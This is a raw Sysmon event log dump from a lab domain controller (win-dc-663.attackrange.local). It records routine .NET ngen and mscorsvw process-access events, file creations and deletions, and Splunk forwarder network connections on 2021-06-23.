21:06:38.494{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25E-60D3-E904-00000000CF01}3836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022140Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:38.432{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25E-60D3-E804-00000000CF01}4068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022139Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.385{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A25E-60D3-E804-00000000CF01}4068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022138Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:38.385{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25E-60D3-E804-00000000CF01}4068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022137Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:38.135{4DB9351A-A25C-60D3-E704-00000000CF01}5480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1568-0\System.Windows.Forms.DataVisualization.dll2021-06-23 21:06:38.135 23542300x800000000000000022169Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:39.729{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3FAE890521E94B2829DC2D47BA3B727,SHA256=6DC8E831ADE5D6366DB30F3606094247EBC3761B28052F74A2383EDC15154D26,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000022168Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:38.299{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61453-false10.0.1.12-8000- 23542300x800000000000000022167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.385{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DBE5C2587D955BAC6D629F1ECBA61C86,SHA256=A0C40A823A845D17EA06013D27E22024241D6027D9CE487A00F5F9F9E365E35E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:39.353{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25F-60D3-EF04-00000000CF01}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022165Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.338{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A25F-60D3-EF04-00000000CF01}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022164Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:39.338{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25F-60D3-EF04-00000000CF01}3816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022163Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:39.228{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25F-60D3-EE04-00000000CF01}6548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022162Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.228{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A25F-60D3-EE04-00000000CF01}6548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022161Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:39.228{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25F-60D3-EE04-00000000CF01}6548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022160Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:39.150{4DB9351A-A25F-60D3-ED04-00000000CF01}6712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a38-0\System.Windows.Presentation.dll2021-06-23 21:06:39.150 23542300x800000000000000022159Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.150{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022158Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.057{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A25F-60D3-ED04-00000000CF01}6712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022157Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.041{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A25F-60D3-ED04-00000000CF01}6712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022156Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:39.041{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A25F-60D3-ED04-00000000CF01}6712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 354300x800000000000000022178Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:39.189{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61454-false10.0.1.12-8089- 10341000x800000000000000022177Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:40.776{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A260-60D3-F104-00000000CF01}4760C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022176Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:40.744{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A260-60D3-F104-00000000CF01}4760C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022175Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.932{4DB9351A-9F2C-60D3-D000-00000000CF01}50642724C:\Windows\Explorer.EXE{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022245Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:46.900{4DB9351A-9DDD-60D3-0D00-00000000CF01}904860C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022244Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.900{4DB9351A-9DDD-60D3-0D00-00000000CF01}904860C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022243Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.900{4DB9351A-9DDD-60D3-0D00-00000000CF01}904860C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022242Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:46.900{4DB9351A-9DDD-60D3-0D00-00000000CF01}904860C:\Windows\system32\svchost.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022241Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
